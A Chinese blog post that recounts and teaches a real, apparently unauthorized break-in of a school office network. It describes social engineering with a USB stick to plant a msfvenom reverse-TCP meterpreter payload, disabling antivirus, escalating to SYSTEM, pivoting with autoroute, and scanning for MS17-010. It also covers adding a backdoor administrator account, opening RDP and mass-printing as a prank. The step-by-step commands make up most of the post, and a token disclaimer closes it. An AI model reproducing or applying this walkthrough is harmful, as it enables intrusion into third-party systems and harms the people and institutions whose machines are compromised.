使用msf+社会工程学 提权内网并留下纪念

本人菜鸡一枚,写这篇文章只为了记录一下我的过程以及替其他小白提供一点帮助吧

在经历了研究msf半个月的时间内,了解到msf的确是内网中的一把利剑但遗憾的是当时试过使用Msf+Ngork内网映射尝试外网环境反弹内网的shell,不知道为什么经常中断,就不了了之了,但是我并没有放弃,于是嘛~~

氪金!玄不救非,氪不改命

于是我就买了一个腾讯云服务器,

在控制台把公网ip转换为弹性

在控制台把公网ip转换为弹性

在控制台把公网ip转换为弹性

重要的事情说三遍,不然是无法反弹shell的

学生价很便宜,推荐购买,我搭建了一个ubuntu系统,

在简单的apt-get update apt-get upgrade ........之后


使用katoolin安装了msf


这里是katoolin的下载地址git clone https://github.com/LionSec/katoolin.git

使用msf+社会工程学 提权内网并留下纪念_第1张图片
图片发自App

1 然后回车 再1 就成功添加了kali的源


再apt-get install metasploit-framework

就正常安装msf5了

使用msf+社会工程学 提权内网并留下纪念_第2张图片
图片发自App


然后就先使用

msfvenom -p windows/meterpreter/reverse_tcp LHOST=(你的服务器公网IP) LPORT=(随便一个端口,例如我的999) -f exe -o /root/1.exe 

这个命令生成一个木马,木马路径在/root/文件下

lhost就是你的公网IP,lport就是你的监听端口


然后我们启动msf,命令 msfconsole

使用msf+社会工程学 提权内网并留下纪念_第3张图片
图片发自App

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set LHOST 172.105.0.9 (这里是服务器私网IP!)

set LPORT 999 (这里是监听端口,和木马设置的一样就ok)

exploit 开始监听,等待对方打开文件

使用msf+社会工程学 提权内网并留下纪念_第4张图片
图片发自App


接下来因每个人目的不同,我的目标机器是办公楼的一台主机,里面全是老师和一些学生会的人,于是我就装成学生会去打印文件???,于是等了一会儿,终于插上U盘,复制文件到启动项,以备不时之需,哦豁,360马上给我删了,没办法,我是个菜鸡,试过免杀也没过去,一不做二不休,直接关了防火墙和退出360,,拿下shell,开溜。。,,(虽然附近人看着我怪怪的)然后成功反弹到shell,(因为我已经成功的做了想做的事情,删掉了木马,后面就没有截图了)

使用msf+社会工程学 提权内网并留下纪念_第5张图片
图片发自App


监听成功,获得meterpreter。

getuid,是查看主机名

我当时只是一个administrator,并不是最高的system,于是就用

ps 查看进程id

找到system的进程,

(因为我这边的system进程id为1022,所以我就转移到了1022)

migrate 1022

再getuid 查看


就提升到了system权限了

然后 run get_local_subnets

获取目标地址网段

我这边为192.168.15.0/255.255.0.0


于是直接添加去往目标网段的路由

run autoroute -s 192.168.15.0/255.255.0.0

再使用

run autoroute -p

我已经成功添加一条路由

192.168.15.0 255.255.255.0

background

可以返回后台,并保存会话

使用sessions -i 查看会话

sessions -i (会话id)连接会话

因为我们现在已经在192.168.15.0/24这个网段下,所以可以使用nmap或其他漏洞扫描工具

扫描内网主机漏洞

使用“永恒之蓝”漏洞扫描模块进行内网所有主机进行漏洞扫描。

use auxiliary/scanner/smb/smb_ms17_010

show options

set rhosts 192.168.15.0/24

set threads 50

run


结果我这边发现

192.168.15.3

192.168.15.245两台机器存在永恒之蓝漏洞

使用msf+社会工程学 提权内网并留下纪念_第6张图片
图片发自App


于是就草草写了一个doc,待会有大作用

因为我的后台会话id为1

所以我直接sessions -i 1

连接shell,

输入

shell

可以直接在cmd下添加用户

net user test test123 /add

net localgroup administrators test /add

成功将用户test加冕为王,此时

exit

返回meterpreter会话

upload /root/test.doc C:\

上传我的doc到主机c盘根目录下

使用msf+社会工程学 提权内网并留下纪念_第7张图片
图片发自App

图片发自App

然后使用

run getgui -e  开启目标主机3389

不知道为什么好像不行,就用cmd打开了

使用msf+社会工程学 提权内网并留下纪念_第8张图片
图片发自App

然后因为我们还在同一个网段下面,直接

apt install rdesktop

安装rdesktop,

然后就直接rdesktop

rdesktop -u test -p test123 -g 1024*720 192.168.15.3

连接上目标主机

打开我们c盘下的test.doc

打开后,选择打印,emmmm,一百张~

使用msf+社会工程学 提权内网并留下纪念_第9张图片
图片发自App

然后删木马,清日志,(我好像没清。。就跑了。。)

使用msf+社会工程学 提权内网并留下纪念_第10张图片
图片发自App


 完美,现在,已经成功实现了很多人曾经的那个中二梦。~~,

有人敲门,我的快递可能到了,告辞

转载请注明出处,请勿用于违法犯罪,开心就好,一切后果概不负责,

tail tail

使用msf+社会工程学 提权内网并留下纪念_第11张图片
图片发自App

你可能感兴趣的:(使用msf+社会工程学 提权内网并留下纪念)